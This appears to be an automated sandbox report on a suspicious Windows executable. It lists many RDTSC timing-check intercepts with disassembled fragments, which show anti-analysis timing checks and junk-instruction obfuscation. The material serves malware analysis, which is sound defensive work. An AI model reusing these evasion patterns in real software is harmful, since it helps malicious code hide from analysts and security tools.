Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 727944 second address: 72795C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jnp 00007FED74F3E516h 0x0000000f jne 00007FED74F3E516h 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 726634 second address: 72664B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FED75508873h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 727106 second address: 727111 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jne 00007FED74F3E516h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 727261 second address: 727267 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 727267 second address: 727272 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push esi 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 727272 second address: 727278 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 72F56B second address: 72F592 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007FED74F3E531h 0x0000000c ja 00007FED74F3E516h 0x00000012 jmp 00007FED74F3E525h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 72F592 second address: 72F5AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FED75508877h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 72F5AD second address: 72F5C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push esi 0x0000000c pop esi 0x0000000d jc 00007FED74F3E516h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 72F5C2 second address: 72F5CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 je 00007FED75508868h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 72F5CF second address: 72F5DA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jl 00007FED74F3E516h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 72F5DA second address: 72F600 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jng 00007FED75508866h 0x0000000d jmp 00007FED75508879h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 72F72E second address: 72F74B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 je 00007FED74F3E516h 0x0000000b pop edx 0x0000000c pushad 0x0000000d jmp 00007FED74F3E51Eh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 72FEDD second address: 72FEED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FED7550886Bh 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 7304B7 second address: 7304BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 7304BB second address: 7304C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push esi 0x0000000a pop esi 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 7304C9 second address: 7304D3 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FED74F3E51Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 734F15 second address: 734F1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FED75508866h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 734F1F second address: 734F29 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FED74F3E516h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 734F29 second address: 734F65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jmp 00007FED75508878h 0x0000000c pushad 0x0000000d popad 0x0000000e pop edi 0x0000000f pushad 0x00000010 jmp 00007FED75508877h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6B68CD second address: 6B68D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FED74F3E516h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 733DBC second address: 733DC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 733DC0 second address: 733DC6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 733DC6 second address: 733DD3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jbe 00007FED75508866h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6F966B second address: 6F9670 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6F97B9 second address: 6F97C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pushad 0x00000008 jo 00007FED75508866h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6F97C9 second address: 6F97E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 jng 00007FED74F3E520h 0x0000000e jmp 00007FED74F3E51Ah 0x00000013 push ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6F9896 second address: 6F989A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6F9B9F second address: 6F9BA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6F9BA3 second address: 54BAE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 jmp 00007FED7550886Dh 0x0000000d push dword ptr [ebp+122D0C21h] 0x00000013 jc 00007FED75508866h 0x00000019 mov edx, ecx 0x0000001b call dword ptr [ebp+122D244Ah] 0x00000021 pushad 0x00000022 sub dword ptr [ebp+122D1C6Ch], edi 0x00000028 xor eax, eax 0x0000002a mov dword ptr [ebp+122D1C6Ch], ecx 0x00000030 sub dword ptr [ebp+122D1C6Ch], esi 0x00000036 mov edx, dword ptr [esp+28h] 0x0000003a stc 0x0000003b mov dword ptr [ebp+122D36A8h], eax 0x00000041 jmp 00007FED75508871h 0x00000046 mov esi, 0000003Ch 0x0000004b stc 0x0000004c add esi, dword ptr [esp+24h] 0x00000050 mov dword ptr [ebp+122D1C56h], ecx 0x00000056 lodsw 0x00000058 ja 00007FED75508872h 0x0000005e add eax, dword ptr [esp+24h] 0x00000062 pushad 0x00000063 xor dword ptr [ebp+122D1990h], edi 0x00000069 or ebx, 4FB5547Ch 0x0000006f popad 0x00000070 mov ebx, dword ptr [esp+24h] 0x00000074 clc 0x00000075 push eax 0x00000076 js 00007FED75508874h 0x0000007c push eax 0x0000007d push edx 0x0000007e push eax 0x0000007f push edx 0x00000080 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6F9D31 second address: 6F9D8D instructions: 0x00000000 rdtsc 0x00000002 jne 00007FED74F3E51Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xor dword ptr [esp], 412A02DAh 0x00000011 push 00000000h 0x00000013 push eax 0x00000014 call 00007FED74F3E518h 0x00000019 pop eax 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e add dword ptr [esp+04h], 00000014h 0x00000026 inc eax 0x00000027 push eax 0x00000028 ret 0x00000029 pop eax 0x0000002a ret 0x0000002b add ecx, 64617E86h 0x00000031 call 00007FED74F3E519h 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007FED74F3E528h 0x0000003d rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6F9D8D second address: 6F9DCB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jp 00007FED75508866h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e jmp 00007FED7550886Ah 0x00000013 jmp 00007FED75508878h 0x00000018 popad 0x00000019 mov eax, dword ptr [esp+04h] 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 ja 00007FED75508866h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6F9DCB second address: 6F9DCF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6F9DCF second address: 6F9E22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FED75508879h 0x0000000b popad 0x0000000c mov eax, dword ptr [eax] 0x0000000e push eax 0x0000000f jmp 00007FED75508878h 0x00000014 pop eax 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 push eax 0x0000001a push edx 0x0000001b jnc 00007FED75508871h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6FA08C second address: 6FA091 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6FA091 second address: 6FA096 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6FA7FD second address: 6FA801 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6FA801 second address: 6FA807 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6FA807 second address: 6FA80B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6FA80B second address: 6FA80F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6FA80F second address: 6FA824 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FED74F3E51Ah 0x00000010 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6FAA71 second address: 6FAA77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6FAA77 second address: 6FAB18 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 adc cl, 00000076h 0x0000000c lea eax, dword ptr [ebp+12481459h] 0x00000012 push 00000000h 0x00000014 push esi 0x00000015 call 00007FED74F3E518h 0x0000001a pop esi 0x0000001b mov dword ptr [esp+04h], esi 0x0000001f add dword ptr [esp+04h], 00000019h 0x00000027 inc esi 0x00000028 push esi 0x00000029 ret 0x0000002a pop esi 0x0000002b ret 0x0000002c mov edi, dword ptr [ebp+122D3838h] 0x00000032 nop 0x00000033 pushad 0x00000034 jmp 00007FED74F3E522h 0x00000039 jmp 00007FED74F3E529h 0x0000003e popad 0x0000003f push eax 0x00000040 push ebx 0x00000041 jmp 00007FED74F3E524h 0x00000046 pop ebx 0x00000047 nop 0x00000048 mov dword ptr [ebp+122D17D4h], ecx 0x0000004e lea eax, dword ptr [ebp+12481415h] 0x00000054 or dword ptr [ebp+1247462Ah], edi 0x0000005a mov dword ptr [ebp+122D2963h], esi 0x00000060 push eax 0x00000061 jc 00007FED74F3E51Eh 0x00000067 push ecx 0x00000068 push eax 0x00000069 push edx 0x0000006a rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 7340AE second address: 7340CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FED7550886Ah 0x0000000a pop eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 pop edx 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 7340CB second address: 7340D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 7340D3 second address: 7340DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 73439E second address: 7343BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FED74F3E527h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 7346C4 second address: 7346D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 737D5E second address: 737D64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 737D64 second address: 737D6A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 737D6A second address: 737D78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 737D78 second address: 737D8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jne 00007FED7550886Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 737D8F second address: 737DA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FED74F3E51Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 737DA1 second address: 737DA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 73E97E second address: 73E982 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 73D4BC second address: 73D4C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 73D4C1 second address: 73D4DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FED74F3E51Ah 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c jnp 00007FED74F3E51Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 73D779 second address: 73D77D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 73D77D second address: 73D783 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 73D783 second address: 73D789 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 73D789 second address: 73D7A2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 jbe 00007FED74F3E516h 0x0000000b pop esi 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 jo 00007FED74F3E516h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 73D7A2 second address: 73D7B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FED75508866h 0x0000000a jbe 00007FED75508866h 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 73D7B3 second address: 73D7B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 73D906 second address: 73D929 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED75508875h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jo 00007FED7550886Eh 0x0000000f push edi 0x00000010 pop edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 73D929 second address: 73D947 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push ebx 0x00000006 push ecx 0x00000007 jmp 00007FED74F3E525h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 73DAB4 second address: 73DAC3 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FED75508866h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push edx 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 73DC4B second address: 73DC75 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jns 00007FED74F3E516h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pushad 0x0000000e jmp 00007FED74F3E528h 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 73DC75 second address: 73DC79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 73DC79 second address: 73DC7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 73DC7D second address: 73DC83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 73DDE9 second address: 73DE01 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E524h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 73E328 second address: 73E32D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 741DD2 second address: 741DE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FED74F3E51Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 741DE2 second address: 741DF8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED75508870h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 741DF8 second address: 741E09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007FED74F3E51Bh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 744A87 second address: 744A8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 744BFE second address: 744C08 instructions: 0x00000000 rdtsc 0x00000002 js 00007FED74F3E516h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 744C08 second address: 744C0F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 744C0F second address: 744C29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 jmp 00007FED74F3E521h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 744EFE second address: 744F13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007FED75508866h 0x0000000a jmp 00007FED7550886Bh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 749ED4 second address: 749F0D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 ja 00007FED74F3E516h 0x0000000d pop ecx 0x0000000e popad 0x0000000f pushad 0x00000010 push edx 0x00000011 push esi 0x00000012 pop esi 0x00000013 pop edx 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 ja 00007FED74F3E516h 0x0000001d jc 00007FED74F3E516h 0x00000023 popad 0x00000024 jmp 00007FED74F3E522h 0x00000029 pushad 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6B163B second address: 6B1662 instructions: 0x00000000 rdtsc 0x00000002 js 00007FED7550887Dh 0x00000008 jo 00007FED75508866h 0x0000000e jmp 00007FED75508871h 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 push ecx 0x0000001a pop ecx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6B1662 second address: 6B167E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E528h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6B167E second address: 6B1684 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6B1684 second address: 6B16B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 popad 0x00000007 jng 00007FED74F3E516h 0x0000000d jmp 00007FED74F3E51Dh 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FED74F3E526h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6B16B7 second address: 6B16BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
